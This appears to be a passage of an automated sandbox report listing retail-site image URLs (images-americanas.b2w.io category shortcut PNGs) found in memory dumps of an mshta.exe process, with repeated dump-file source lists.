Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png9F
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.pngame
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.pnge
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.pngq
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.pngrap
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510309350.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.png
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.png=dk
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.pngc__
Source: mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510409430.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.pngg
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510309350.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506386421.00000000071B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.pngng
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.pngse-
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555895561.0000000009681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541646516.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575002147.0000000009682000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.png
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555895561.0000000009681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575002147.0000000009682000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.png4OW
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555895561.0000000009681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575002147.0000000009682000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.png5.pn
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.png?
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.pngM
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.pngs
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555895561.0000000009681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541646516.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575002147.0000000009682000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.png
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.png%
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.png3Z
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.pngAZ
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.pngIX
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555895561.0000000009681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575002147.0000000009682000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.pngg
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.pngwX
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558057036.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555895561.0000000009681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541646516.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575002147.0000000009682000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542732517.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-informatica-acessorios-8f96648a2579.
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510309350.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577325605.000000000A988000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 